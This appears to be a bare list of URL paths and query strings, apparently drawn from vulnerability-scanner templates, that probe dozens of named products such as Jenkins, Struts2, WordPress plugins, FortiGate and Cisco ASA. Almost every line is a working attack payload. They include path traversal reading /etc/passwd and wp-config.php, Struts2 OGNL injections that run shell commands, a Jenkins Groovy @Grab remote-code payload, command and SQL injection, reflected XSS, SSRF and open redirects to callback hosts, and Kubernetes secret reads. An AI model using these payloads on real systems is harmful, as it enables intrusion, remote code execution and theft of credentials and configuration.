/dumpmdm.cmd
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/cgi-bin/login?LD_DEBUG=files
/html/log
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/../../etc/passwd
/filemanager/upload.php
/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;id;%27
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/blast/nph-viewgif.cgi?../../../../etc/passwd
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/type.php?template={{payload}}
/data/cache_template/rss.tpl.php
/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine
?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/wp-content/plugins/wp-payeezy-pay/donate.php
/wp-admin/options-general.php?page=smartcode
/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails
/anchor/errors.log
/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1
/modules/bamegamenu/ajax_phpcode.php?code=print(md5({{num}}))
/user/scripts/login_par.js
/Admin
/device.rsp?opt=user&cmd=list
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}
/command.cgi?cat%20/etc/passwd
/.../.../.../.../.../.../.../.../.../windows/win.ini
/...\...\...\...\...\...\...\...\...\windows\win.ini
/..../..../..../..../..../..../..../..../..../windows/win.ini
/....\....\....\....\....\....\....\....\....\windows\win.ini
/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23
/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23
/nagiosql/admin/menuaccess.php
/uir//etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
/jkstatus
/jkstatus;
/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/img.php?f=/./etc/./passwd
/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/index.php?op=fileviewer&file=/etc/passwd
/meta
/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/
/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/nuxeo/login.jsp/pwn${31333333330+7}.xhtml
/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../etc/passwd
/index.php?q=file:///etc/passwd
/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected
/imcat/root/tools/adbug/binfo.php?phpinfo1
/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd
/_next/../../../../../../../../../etc/passwd
/include/downmix.inc.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}
/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html
/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html
/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email=
/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print
/global-protect/login.esp?user=j%22;-alert(1)-%22x
/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1
/cgi-bin/awstats.pl?config={{randstr}}
/awstats/awstats.pl?config={{randstr}}
/awstats.pl?config={{randstr}}
/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
/__raw/services/server/info/server-info?output_mode=json
/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
//interact.sh
/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/echo-server.html?code=test&state=http://www.interact.sh#
/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh
/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/password.htm
/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B
/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E
/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/login?next=http://interact.sh/?app.scan/
/signup?next=http://interact.sh/?app.scan/
//www.interact.sh
/IntellectMain.jsp?IntellectSystem=https://www.interact.sh
/fcgi-bin/wgsetcgi
/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=
/html/repository
/services/user/values.xml?var=STATUS
/html/device-id
/select_project.php?url=http://interact.sh
/clock_status.php?current_page=http://interact.sh
/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1
/html/common/forward_js.jsp?FORWARD_URL=http://oast.me
/html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me
/wp-admin/admin.php
/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3
/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C
/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties
/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f
/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html
/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E
/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8
/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
/OA_HTML/lcmServiceController.jsp
/node_modules/../../../../../etc/passwd
/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm
/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>
/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
/redirector.php?url=https://interact.sh
/redirector.php?do=nodelay&url=https://interact.sh
/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes
/includes/mysql2i/mysql2i.func.php
/addons/phpmailer/phpmailer.php
/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68
/jobs/?\
/wp-content/uploads/wp-security-audit-log/failed-logins/
/tests/generate.php
/
